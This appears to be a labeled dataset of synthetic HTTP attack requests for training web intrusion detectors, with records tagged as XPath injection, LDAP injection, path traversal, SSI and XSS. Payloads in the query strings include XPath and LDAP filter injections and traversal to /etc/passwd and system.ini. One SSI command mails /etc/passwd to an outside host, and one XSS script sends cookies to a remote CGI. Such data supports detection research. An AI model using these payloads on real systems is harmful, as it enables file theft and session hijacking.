UA-CPU: PowerPC
UA-Disp: 747,476,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 4135x5853
Via: HTTP/5.6 www.tct9dpg.gif
Transfer-Encoding: deflate
Upgrade: ei2y/3.0
Warning: 610 www.24teifwn.png "Opivct0gaEd" 
X-Forwarded-For: 43.11.206.228
X-Serial-Number: 83889853145892267537
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35850
Start - Id: 49328
class: XPathInjection
GET /szvaniIie1e/eX1FkvY/t6O/tEnvbeeqhhia/94.5-X/iiowhnqy0hwuchvuaIr/tpwnQy3neeOaavibia/dDrDIHwMt5.htm?a4H=tqtpxlsoialamtein&1UA66XOGMUu=ej4eI%3F+&SDCNIR-=187&@1H0GGJ=0wg+mdiv%3Fsio+GL+io&n3ya3tivegeoa8=iitelnetbrrstua+&25pdaymsintlfs=mnph%27++++or++6+%3C++count%28path%2Fchild%3A%3A*%29+or+%27fteth%27++++%3D++%27&oec1Os=16682 HTTP/1.0
Host: www.aTtdVeidu3.com:80
Connection: close
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: no-transform
Client-ip: 23.87.77.7
Cookie: baeohBtFshlet1=76246;twhdoniH=e0cqdAxan(1esock_stream3;ed=nts7;faZTmR=44686;me5Tti=ecao;7jre=hr'
Cookie2: $Version="94"
Date: Fri, 06 Jul 07 10:53:32 GMT
ETag: "f-78hbGcyMFOKmfms"
Expect: tpfss
From: 5sny@toesr.uk
If-Modified-Since: Mon, 08 Sep 08 24:30:08 GMT
If-Unmodified-Since: Wed, 17 Mar 10 21:19:13 GMT
If-Match: "gyKNbR_I5KPfq01"
If-None-Match: *
If-Range: *
Max-Forwards: 1007
MIME-Version: 6.3
Pragma: ee5rhcb='se'
Proxy-Authorization: artrps eibl=2ExpiAa
Authorization: Basic c29pZTplbHRxcmVN
Range: -8
Referer: /hhdL/astceEhr.png
TE: trailers,trailers,trailers
Trailer: Accept-Language
User-Agent: SotyyeCStvNo0yR
UA-CPU: StrongARM
UA-Disp: 576,409,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 953x2070
Via: 4.5 www.emhukO.tiff, FTP/7.8 www.ansa.tiff
Transfer-Encoding: deflate
Upgrade: vJltet/0.9, dda/3.3, iieen/3.3, aNr4k2/1.4, h82fxs/8.6
Warning: 906 www.mgsdP.jpg "luEthgfredan" 
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 6608359
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49328
Start - Id: 49380
class: XPathInjection
GET /s@ZN2SrYKV6/sGd8qmdFZdTb-MSeMd/eY5/qULAIOOTGQVccs/s47q41WOHym0GJ/mnLWmYAh8i7yj/osqetUjoe.mspx?fQintD3binn5H=7581&8Qs=varxtermwievalegroup+byechtpassbdvadqnodeor&dS0fjdvbscriptM.LS=2&gh1ewsecooec4=zSskgbh&IImX-OuD3=lq&c7dbeooasenesec=sstlutnlldeeaor&fpojaeieoatFjty=41&AtDlrfthaelIld=745417&tSiklyueb=%3Dt7+c7Q2cteer&eeeo=drebt%27+or+count%28++++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i+%2B++++j%2B++k%2Bl+++%2B++1%29%5D++++%7C+path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+or+++%2769l8qdT%27++++%3D%27+++++yxho%27++++or&hbdtnStvy=qadmint7&hlSstd8i3tnms=52497&ze5e=rlznv HTTP/1.0
Host: www.tw2zne.biz
Connection: close
Accept: application/*;q=0.7
Accept-Charset: *
Accept-Encoding: gzip, identity;q=0.4, compress;q=0.4, gzip;q=0.9, compress
Accept-Language: ypcee-p2;q=0.8, loto-ass, 4mrn6Eu-p0o;q=0.9
Cache-Control: Eo='d9stet'
Client-ip: 52.139.126.66
Cookie: oThvslw=71;gi7rrmsru6=l9e;tee=ryhd3;sttMnel=seetl(iti;eeBomresiac=u\sa~tkrt
Cookie2: $Version="66"
Date: Mon, 24 Dec 07 12:58:13 CET
ETag: "8EMWsrpgGBvHJnZ9p9om"
Expect: 0sTS
From: otln@tpiaietAi5.st
If-Modified-Since: Sun, 20 Jan 08 19:44:22 GMT
If-Unmodified-Since: Mon, 31 May 04 13:01:45 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 22 Jul 09 15:38:40 CET
Max-Forwards: 0777
MIME-Version: 7.0
Pragma: no-cache
Proxy-Authorization: gWoe no1msa3=apmn
Authorization: nae8oa ufesao=bnthuhs
Range: 6-,-18019
Referer: http://iecS9hls.ch/7paolroe/fyctu/4uqtroa/amhtmgF1.mdb
TE: chunked
Trailer: Pragma
User-Agent: Mozilla/4.5 (Windows; U; Windows NT 5.9; bT-yf; rv:7.8.7) Gecko/42663987
UA-CPU: StrongARM
UA-Disp: 129,1543,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0695x2392
Via: BitA/4.3 www.Enn8oie.css
Transfer-Encoding: identity
Upgrade: peor/1.1, d2rrnr/4.2
Warning: 968 150.103.51.182:94997 "eidcatleEean" "Fri, 27 Aug 04 02:02:34 GMT"
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 68426632486242488
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49380
Start - Id: 49180
class: XPathInjection
GET /wLTP9k7TmeLLKtVDhPb/c_28wsFx9/tNiP_9JKjjcQy@/bDb0Ozuwj/eL/Kz/sFCQojO/tA9IQZOrB-i6s/saahthwqdnagtetsNm/bodyzgLsystemKqe-Mvbscript/R4hfxsTPXxp_6orm6/a5mgig.dll?qmbet2Nppteigae=auNDbiy%27+++or++++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28+%29%3D%28%28i%2B+j++++%2B++++k++%2B+l++%2B+1%29%5D++%7C+path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++++or++%27SitM%27%3D+%27++tm%27+++or&ejorsh=tlN0&red8js3elo=nl&Qauobaopfimts=e HTTP/1.0
Host: 212.182.232.216
Connection: mtel3
Accept: */*;q=0.8
Accept-Charset: iso-8859-8, x-mac-japanese, windows-1253;q=0.8
Accept-Encoding: identity;q=0.7, gzip;q=0.6, compress;q=0.7
Accept-Language: *
Cache-Control: no-cache
Client-ip: 124.2.130.249
Cookie: a27xhnztn=931495197;NTuiheos7Ve=sixofym ae;3g=O4h;St=eyveboot.inijb
Cookie2: $Version="19"
Date: Wed, 16 Dec 09 04:41:35 UTC
ETag: "fZ.qZvrffsa7UroMMk-R"
Expect: 100-continue
From: ir0psea@aO25fruan.gov
If-Modified-Since: Wed, 25 Feb 09 09:12:45 UTC
If-Unmodified-Since: Sat, 24 Jun 06 14:14:35 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 09 Jan 10 09:18:39 UTC
Max-Forwards: 99
MIME-Version: 6.2
Pragma: Nideha=ash
Proxy-Authorization: Basic bnRlbHdoZXc6bnRpZQ==
Authorization: NTLM ZDB0NThybHNoMmFyZ2VIcmloaUVhWGVvb2VBbmNlbmVq
Range: 87-,-69535,7135-70843
Referer: http://www.egse.uk/rwsnccfc.msf
TE: trailers,gzip;q=0.2
Trailer: Date
User-Agent: o1hocaLl
UA-CPU: x86
UA-Disp: 577,972,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 400x881
Via: diam/3.6 www.saZi.jpeg, hLotn/5.8 241.155.11.154, 9.3 26.163.213.25
Transfer-Encoding: gzip
Upgrade: q8iste/1.0, ici/0.5, qtyr3/1.9, oea/6.5, h1e5st/7.2
Warning: 858 www.efhrohf.jpg "oIntdrztcn98" 
X-Forwarded-For: 19.241.14.123
X-Serial-Number: 6850092
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49180
Start - Id: 37352
class: LdapInjection
GET /yCwKxfg/m9kBnsG5sock_stream7V7KEZ/eihciletxsgessz.jpeg?fslngacee=9&rpoecveiaauHcl=is55rt&sasycBtSrZx=shOnzA1rP.qR HTTP/1.0
Host: 252.58.105.39
Connection: close
Accept: */*;q=0.1
Accept-Charset: windows-1253
Accept-Encoding: )    (   |    ( cn=*o 'brien*)(mail  =*o'brien*  )
Accept-Language: *;q=0.7
Cache-Control: max-stale=24941
Client-ip: 216.207.233.187
Cookie: TSrRhfupf=If= Gseval;n:vlIas;hervL5d=wherenf4 and m]tmpawehI;28paMu18a=8ee(qi'v9s3e;ci87idbuo=retood9nuEiy;elefiilrsle=ie5ixwpahttpseah
Cookie2: $Version="66"
Date: Sat, 29 Nov 08 20:17:14 UTC
ETag: W/"qgpf_ZNuYqhia_f."
Expect: 100-continue
If-Modified-Since: Fri, 07 Sep 07 22:39:24 CET
If-Unmodified-Since: Wed, 27 Aug 08 20:37:49 CET
If-Match: *
If-None-Match: "AMyVXHgPQGdwO8_"
If-Range: "a78gRMT@Gk3Nuow"
Max-Forwards: 1884
Pragma: 6fqfcqR='alsaeb'
Proxy-Authorization: Digest uri=http://www.apmsiuyp.cz/Wrdfo/eamtufe/cmsjt.jsp
Authorization: Basic THVzcjpxZmxwVGV3cg==
Referer: /eupg/IsMfsi/iuesnet/0rptk/erzdalen.pdf
Trailer: If-None-Match
User-Agent: Mozilla/5.7 (Windows; U; WinNT 7.5; uh-dt; rv:3.4.6) Gecko/40717720
UA-Disp: 826,0920,16
UA-Pixels: 5121x090
Via: HTTP/1.8 26.245.213.203:2939, FTP/2.5 13.143.15.21
Transfer-Encoding: compress
Upgrade: zcs/5.9
Warning: 832 142.119.49.230:5 "wgqnniyc" "Sat, 14 Mar 09 15:27:59 GMT"
X-Serial-Number: 3225774785
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37352
Start - Id: 46199
class: PathTransversal
GET /sY/wq/iarth4a/trrhhzzxqtEraOkh/GXF2RaOdu99l/ranede3wnCnzhVsnwlbc.cgi?ms05tbsrhmsgpoR=94&os=%2Fetc%2Fpasswd&ea4omNaoONo=iim&hhem2=omxyhetbgen+e1s&rfXsmemanfedea=mIniCJ3FzTp&UPwhereBPFsr4Q1a=33&snns1=f%25obetween+ HTTP/1.1
Host: 206.163.154.233:80
Connection: keep-alive
Accept: text/plain;q=0.8, application/*, image/jpeg;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: e5Ntgis-Slndge, ayewMai-cetiuc, t-glTuS;q=0.0, Reejio2l-ronutOn;q=0.5
Cache-Control: max-age=04418
Client-ip: 250.173.5.46
Cookie: mt=o-CCCjTzUG;sqorbe9nv=d(>unionboot.ini;bgaj=869486
Cookie2: $Version="43"
Date: Thu, 18 Jan 07 01:39:37 GMT
ETag: W/"BwoAIQ_gJnkwh@ELCI"
Expect: 100-continue
From: eroma@sh9Pe.fr
If-Modified-Since: Thu, 31 Jul 08 08:55:47 GMT
If-Unmodified-Since: Fri, 20 Feb 09 21:16:22 UTC
If-Match: *
If-None-Match: "EeC9TmUiC5mCDt36AMO"
If-Range: *
Max-Forwards: 07
MIME-Version: 0.2
Pragma: jba='f'
Proxy-Authorization: Basic YWNlaTp0dVJlYw==
Authorization: Basic c2Zoa2xhOm5ubWJsaWVh
Range: 684-,-674552,060-
Referer: /trdSlO/rqSdbhnl/1hm1g.swf
TE: gzip,trailers
Trailer: Accept
User-Agent: Mozilla/1.9 (Windows; U; Win98 8.4; ld-r2; rv:8.7.6) Gecko/27446713
UA-CPU: x86
UA-Disp: 411,052,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 939x7286
Via: FTP/9.9 74.143.56.72, 4.8 www.sdnNtw.css
Transfer-Encoding: compress
Upgrade: peg/8.7, taas/9.0, SiHads/8.8, ne61as/9.8
Warning: 034 www.nkeyuho.html "s4csmi7rg" 
X-Forwarded-For: 249.22.33.20
X-Serial-Number: 4158799
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 46199
Start - Id: 38153
class: LdapInjection
GET /t82eutnds0benersbsec/oceSmtpTo/aAbfha4/oiehLrwn/iRuwrGT.html?feCyegialsg7=rE%29%28+++%7C%28te%3D*%29&eevaitstTxwe7t=60&tNtna5hcbvhowt=ieea&nei9occretyo6=Sat HTTP/1.0
Host: 81.210.100.140
Connection: nraaot
Accept: */*;q=0.2
Accept-Charset: x-mac-arabic;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=151
Client-ip: 106.203.232.28
Cookie: ceds=nzCoq;oh5irdt35ln5um=trst;7aser2=ee%u7a;zoTxzdmedpEr=7976849487;fkioa1acqsk2toS=c<croimeTh
Cookie2: $Version="2"
Date: Tue, 28 Feb 06 05:59:17 UTC
ETag: "Ptct44HXIkgtS5In"
Expect: 100-continue
From: 7enqeIo@sjtoi.net
If-Modified-Since: Fri, 24 Feb 06 24:28:42 CET
If-Unmodified-Since: Fri, 27 Feb 09 07:06:25 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 990
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: Basic YWVhbjplamVlY2hjbg==
Authorization: njtdo oiaHAsOe=InaIstei
Range: 652463-080254,-92,5914-088
Referer: http://www.ttnakapt.org/l8a9ex/o8oe.css
TE: gzip,gzip;q=0.4
Trailer: Proxy-Authorization
User-Agent: eEAKNi http://www.Sexrc.be
UA-CPU: StrongARM
UA-Disp: 651,9493,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 9560x3335
Via: eys/5.7 www.Ee2qe.js, FTP/2.1 www.nw2e.css, 9.3 www.eonr1lzr.tiff
Transfer-Encoding: gzip
Upgrade: tfcsu/8.0, late/9.1, 9vp6/5.4, h2zo/6.8, hai3pl/9.2
Warning: 967 www.teLieti.js "bUr2" 
X-Forwarded-For: 106.193.146.221
X-Serial-Number: 276586158043
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 38153
Start - Id: 49607
class: XPathInjection
GET /CF_/bpjnc/amLqDnl/s7ut/mhTtuihn/at3cyi/pgoa8EleonulaeSTat0r/q9gcq@v3VWy/whereIl/system-fOvj4rcprG/4vOW1euguCFe.shtml?IHKRLN-Ek=+&avonu0ow=107288&vqdJKt-YYE=7031+++++or+count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D+++++%7C+++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++++or++++89493%3D HTTP/1.0
Host: 254.38.47.102
Connection: aba6cbom
Accept: */*
Accept-Charset: iso-8859-15;q=0.3, iso-2022-kr;q=0.2, gb2312;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: e=4emOe
Client-ip: 126.206.123.83
Cookie: telnetOZx='aite;Q@Kg=76;oyj-mSy9POu=nhlseNn'iHutao
Cookie2: $Version="4"
Date: Tue, 13 May 08 13:42:14 CET
ETag: "dDzynAdXBl83z7Mz"
Expect: brurn5=ihIa
From: b3Tsmet@oiiienq.de
If-Modified-Since: Mon, 24 Mar 08 15:37:02 CET
If-Unmodified-Since: Mon, 25 Aug 08 17:06:42 CET
If-Match: "CFMJT9mvKgUvn-J9lB1P"
If-None-Match: *
If-Range: Tue, 05 Oct 04 05:56:11 UTC
Max-Forwards: 042
MIME-Version: 9.4
Pragma: x=e6
Proxy-Authorization: Hsia5 4xaft=eores4
Authorization: NTLM dXRpZW50d3k0bXl1dHBkU25wdGtFb3NkdnJpdGNvdG9kZWNpdmRz
Range: 7852-
Referer: http://www.1lqcheU.gov/mvseota/eiai5ct/ee8ee.swf
TE: chunked,trailers,deflate
Trailer: Range
User-Agent: Mozilla/4.5 (Windows; U; Win98 2.5; ot-mc; rv:9.0.8) Gecko/10026814
UA-CPU: 68000
UA-Disp: 1997,806,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 3223x940
Via: 6.4 20.250.59.5, FTP/4.0 197.240.162.53
Transfer-Encoding: tbsn
Upgrade: add/2.5
Warning: 760 227.98.126.37 "nIw39hepCclatnett8" "Tue, 06 Nov 07 04:36:32 GMT"
X-Forwarded-For: 94.116.73.204
X-Serial-Number: 9696710
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49607
Start - Id: 35716
class: XPathInjection
GET /lEZJC.Ch.Lf2aIi6.php4?N80o1I..MKy=2++or++++1%3C++++m7t%2Fexvzs%2FrlTie%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D0%5D+++++or+63830%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27&ep=rxo&wVZ-LNfPIc=777 HTTP/1.1
Host: www.toEf.it
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: ehow7in-ee2e;q=0.3, u-4yt;q=0.8, ewap-ra;q=0.9
Cache-Control: no-transform
Client-ip: 77.125.12.174
Cookie: suctdehsisY=9o= 
Cookie2: $Version="9"
Date: Sat, 17 Apr 04 18:36:01 CET
ETag: W/"mZF-ns0Ok3629vIwy"
Expect: 100-continue
From: p1tia@Pqapltwu.it
If-Modified-Since: Sat, 09 Aug 08 12:20:43 CET
If-Unmodified-Since: Sat, 18 Apr 09 09:39:41 CET
If-Match: "ErInwkzFkHAXDNF"
If-None-Match: "6T.17L64ixue@dU4Tud"
If-Range: Sun, 01 Feb 09 04:20:41 UTC
Max-Forwards: 34
MIME-Version: 8.0
Pragma: noDSneiR=en
Proxy-Authorization: Basic ZXllYTc6dHNuMA==
Authorization: NTLM aXg5bm5mbmVyc2hlOWV3aGh0bDI2YmNPaWJ1ZW9ycHlybmUybmVoaWhlbm9oYQ==
Range: 5225-,8-9,1-
Referer: /3tau/ous7s89i.txt
TE: trailers,deflate
Trailer: TE
User-Agent: jnLozNs2g (aky7_bM; sNuFWR9GmX; ghXf2E_s; ep5BHmA.zC)
UA-CPU: Sparc
UA-Disp: 453,3007,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 161x6887
Via: HTTP/5.9 www.0rwrNh.jpg:7, yude/2.0 10.38.47.102:78
Transfer-Encoding: compress
Upgrade: d3ec/2.6, tifat/9.6
Warning: 333 www.a02ai.tiff "tag0etmehhee" "Mon, 26 Jan 04 12:33:53 GMT"
X-Forwarded-For: 171.203.103.227
X-Serial-Number: 727389738621693748
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35716
Start - Id: 45913
class: PathTransversal
GET /ddtlhefaws9aaybeo7z/axWu0a-hGlqmCeo/0iXrs/i6DF7N@Ci/zv7p.50M.jpeg?6oe=%5CWINNT%5Csystem.ini&pyb=soT3phg.r&eserRsn57bf1r=dropt%24%5Dnia6nc-%29LhAu%3E&dorhtjMasnc=IRO%29A&qeetpnua=agG87Dz6Icap HTTP/1.0
Host: www.egamnl1tr.org
Connection: keep-alive
Accept: video/*
Accept-Charset: x-mac-icelandic
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 46.38.190.113
Cookie: HEiso=gkj3;j5PY9x1IC=en=>
Cookie2: $Version="230"
Date: Wed, 14 Jan 09 15:34:58 GMT
ETag: "F9XeIBzlGuOQhpHd7UtM"
Expect: 100-continue
From: sdns@tal3sea.gov
If-Modified-Since: Fri, 18 Dec 09 14:51:12 UTC
If-Unmodified-Since: Tue, 13 Mar 07 16:06:10 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 48
MIME-Version: 1.5
Pragma: ya=aua
Proxy-Authorization: omjasV v1Eoao=notim
Authorization: oeAbas b0Re=adrkl8ih
Range: -106180,0973-,3598-
Referer: http://www.antngea.be/egirdi.jpeg
TE: trailers
Trailer: If-Range
User-Agent: Mozilla/8.8 (X11; U; Open BSD i386 6.0; y0-et; rv:8.0.9) Gecko/33385811
UA-CPU: PowerPC
UA-Disp: 1794,840,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 4595x1071
Via: HTTP/3.4 www.r9rld09u.htm, 2.0 www.giOe.tiff
Transfer-Encoding: gzip
Upgrade: fes/4.2, eismN/3.9
Warning: 095 56.21.175.106:259 "l0gwyrihdtorxlLesCEm" "Thu, 01 Mar 07 09:16:13 CET"
X-Forwarded-For: 210.181.84.191
X-Serial-Number: 9152638367
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45913
Start - Id: 39983
class: SSI
GET /iydEbp6/h6JhM5DpY1kLWVHbsQw/rX49hKBA-RxUgrI8/to0tpeiGDNSd/NB/codsdthe/nlosnteooopr5a/a8.css?oirhsrsemw=039&anbvd=%7ElapmS0telnetlS7iq&H2IDEetcncGu3q=e3aeedleS&gm=%3C%21--+%23exec++cmd%3D%22%2Fbin%2Fmail++ulma.com+++%3C+++%2Fetc%2Fpasswd%22--%3E&n2ah=shsc HTTP/1.1
Host: 224.126.235.206
Connection: keep-alive
Accept: text/xml, application/*, video/*;q=0.0
Accept-Charset: iso-8859-9, windows-1253;q=0.8
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 153.116.216.187
Cookie: oo=ltc&+5sdjspcucdstdin0nsI
Cookie2: $Version="941"
Date: Tue, 16 Nov 04 22:53:23 UTC
ETag: "syLbFXo8hSf7y.nXN"
Expect: 100-continue
From: 5iWxsCt@nr6efecsn.de
If-Modified-Since: Sat, 30 Apr 05 20:33:05 GMT
If-Unmodified-Since: Mon, 09 Jul 07 03:36:18 UTC
If-Match: "gNTnTG4npWGmsZra"
If-None-Match: "IKdmC7jKu_85OKGJs"
If-Range: "t7jWhpECJQT6K7-Pr"
Max-Forwards: 08
MIME-Version: 3.3
Pragma: 71h=sO
Proxy-Authorization: NTLM NlQ2YWhtdWl0dGR2TGxlem9OZW50dG9vaXI5VTVicmlzc2xnbm9rZW9sdGVuZWU=
Authorization: aNtti hpho=sbL68
Range: -038647,3950-886928
Referer: /tmromZes/utsevea/nhhikoFk/nb0weei.gif
TE: trailers,chunked;q=0.7
Trailer: Transfer-Encoding
User-Agent: Mozilla/7.3 (X11; U; Solaris 1.6; oC-8h; rv:1.1.2) Gecko/38828898
UA-CPU: Sparc
UA-Disp: 8616,110,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 8811x8791
Via: 6.3 www.truu7.png, 1.2 49.142.20.225:144, 4.3 217.223.66.154
Transfer-Encoding: compress
Upgrade: ptgi/5.0, Tpaeet/6.5
Warning: 988 144.42.79.118:49591 "sspeenqeLi3zyDee" "Thu, 16 Jun 05 19:34:26 GMT"
X-Serial-Number: 754321
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39983
Start - Id: 38258
class: LdapInjection
GET /5HPaalMizset6hfkearR/2Bs/sPKD/iDBM7C.QfZ6/qz4yT@a2-wUeq5OX/enbashi5dMuvA/awap/cfrRmfBHLR4XpAHrzi5.gif?iTedtoyxo0Rl=n1tj3erQys&eryeehahdil6mEe=dtoypheeemlealtznn&hwwnipi=ors&nitflt=dp+%3E9inecatoa&-WJtmpQBgzmoca=098339&rdugdasetlEsee=nhi3xure&4yie7o=ai0dE%29%28%7C+++%28rro%3D*%29&uDnet=w2a&hog=tosnStntta&s0jnaEqeeyeu=380442&psdtentxe6=ebis HTTP/1.1
Host: 88.70.173.26
Connection: 0eeeu
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.7
Accept-Language: rt7epER-c3sow;q=0.7, rhrw-E4, dcdwftP-wdho;q=0.7, jieni-daed, su2irEe-s2w8riie;q=0.7
Cache-Control: tqenr='lre'
Client-ip: 113.81.106.78
Cookie: eomlNt075oinC=(
Cookie2: $Version="817"
Date: Thu, 13 Mar 08 05:32:39 CET
ETag: W/"DNHJE2Dphp9snBkz4oAm"
Expect: 52cde=otinosw
From: Eorust@uthn0.it
If-Modified-Since: Tue, 03 May 05 08:14:13 GMT
If-Unmodified-Since: Thu, 11 Nov 04 11:58:07 GMT
If-Match: *
If-None-Match: "coOejr864b_ZOWknmw"
If-Range: Fri, 21 May 04 15:48:42 GMT
Max-Forwards: 7
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: NTLM ZXJydTFhY2xuaHV5YTBsYWFlZHVlbmF3aXJkbnV0aW10YQ==
Authorization: hb5aoI r4e5=HNca
Range: -23
Referer: http://erhaxd.fr/7re7lre/onpSOnnn/mtnetrol/y7yetodc.js
TE: chunked,deflate
Trailer: Proxy-Authorization
User-Agent: atgho703d/2.4.2.8.0
UA-CPU: PowerPC
UA-Disp: 087,798,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 8163x303
Via: 5.6 www.hety.css, 0.4 97.201.217.41:83070, aad/6.8 www.vmaei.gif
Transfer-Encoding: identity
Upgrade: eddcT/3.3, roas/0.6
Warning: 420 www.hNfxAea.shtml "ha5earnepwc" "Thu, 20 Jan 05 10:55:49 UTC"
X-Forwarded-For: 95.117.153.98
X-Serial-Number: 05796287611
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38258
Start - Id: 48153
class: XSS
GET /jVcYDHUuHu/PBYwDS/yppm3P/ndsAlideStIzas/fefromIq-gOR44/nkcminfirRvlstu6ompa/aG.z/roacswltaTt1is8Atut/oiolraliVe/XS6B4ZK6fsL0/0cmdOMk--.@8/x3rM_.mdb?21fuyeHsamadmin=raMtda06ceE&zaeY=62418361&0HCuv=ad7oheikjmid&OzLwNv9ul=58912444&kxewnimw2o=%5Ct5%25&melreoOoU9vh=9&vti7turtstcasol=3823&0eeetrrnslnu=%26%3Cscript++%3E%5Bdocument.location.replace%28%27http%3A%2F%2Fwww.asstnina.com%2Fcgi-bin%2Fstns.cgi%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript%3E&q8JzGKRaV=rfraRE7Al1.v&mteeiTxledj=ejAt&scag4Mesrtat=djuaf HTTP/1.1
Host: www.twewh0i.net
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-korean
Accept-Encoding: deflate, deflate;q=0.2, identity;q=0.1, identity
Accept-Language: eIreeref-o;q=0.1, edzn8s-qemsbel
Cache-Control: max-age=182
Client-ip: 211.190.214.99
Cookie2: $Version="4"
Date: Wed, 18 Aug 04 23:43:49 GMT
ETag: W/"VEmXtl7s15oFGnIxna"
Expect: 100-continue
From: ri3oektx@agekwucEtP.ch
If-Unmodified-Since: Fri, 30 Nov 07 15:07:44 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 05 Oct 06 21:48:00 UTC
Max-Forwards: 29
MIME-Version: 8.3
Pragma: Iptahe='erhtjei'
Authorization: Basic MGVlazFhOmVudHk=
Range: 248-
Referer: /rsviotw3/rteen4A/osqaB1g/Ugitldcq.png
TE: trailers,gzip;q=0.3,chunked;q=0.3
Trailer: If-Modified-Since
User-Agent: Mozilla/8.7 (X11; U; SunOS sun4u 4.0; lN-tb; rv:7.2.4) Gecko/50478611
UA-Disp: 187,5451,16
UA-Color: color8
Via: HTTP/4.9 243.11.165.161
Transfer-Encoding: identity
Warning: 475 102.30.177.38 "vrpNbaaNaa2ir" "Mon, 08 Dec 08 15:45:59 UTC"
----: ---------------------------------------

null

End - Id: 48153
Start - Id: 44730
class: PathTransversal
GET /l5whdrneei4ex/brtsttptl/eyluwctente5a1sm/adktdHma1cpestt/AM5cDP/rndezssjfwm/maewALoj/zZkNh/uy5-aaoABEgk/hCy.js?r7ks9gh=..%2F..%2FUBData%2FMembers%2Fmembers.grp%2500&uvarW5W=aasnanx%7Caroe&aogidsreMc=6oAUniD&Aj1q=177&ege4edptwel=SxneeCtooh HTTP/1.1
Host: www.9uosmhIfwr.cz
Connection: close
Accept: video/*, video/*, image/*
Accept-Charset: iso-8859-3;q=0.0, x-mac-turkish, x-mac-icelandic;q=0.0, isiri-3342;q=0.5
Accept-Encoding: 
Accept-Language: ae4lec-yiSnw;q=0.3, bnai-n0eh;q=0.4
Cookie: umtrvit8ea=g;s7hSg4Z=2;pye9fea=t %st;nawira8=h 
Date: Sun, 17 Sep 06 11:27:51 UTC
ETag: "cagFw8bM.KdYd@fBxbEm"
Expect: 100-continue
From: gi6k@oggsey.org
If-Modified-Since: Fri, 09 Oct 09 17:25:51 UTC
If-Match: "dw6r1VT32G0ZvrM4-3Ak"
If-Range: Sun, 13 May 07 13:52:35 CET
Authorization: Basic Um5zdGdyMzp0cGFlZGh2
Range: 218-,38304-
Referer: /ndReuwsy/nbon5/9iiv7.jpeg
User-Agent: Mozilla/4.8 (Machintosh; U; PPC 2.6; ud-wi; rv:8.8.2) Gecko/09583235
UA-CPU: MIPS
Via: 9.2 14.250.46.83, HTTP/4.4 188.252.146.252, HTTP/0.1 www.jeouARq.png:0
Transfer-Encoding: identity
Upgrade: y9uo/8.1, 6tTo/8.6, sd1ve/9.7, OmipFw/5.0, Xew/1.5
----: --------------

null

End - Id: 44730
Start - Id: 48419
class: XPathInjection
GET /2EHZ/yiG@pwIIH.8ndFep/rg/mselect5jGZJ/9VqpI5tIh_eFh91UW-ls/TlMR48kyd8g4YSe/lQj564.FP3_G54SPFg@9.png? HTTP/1.1
Host: www.weroed.org
Connection: keep-alive
Accept: audio/*, application/x-tar;q=0.2
Accept-Charset: *
Accept-Encoding: 
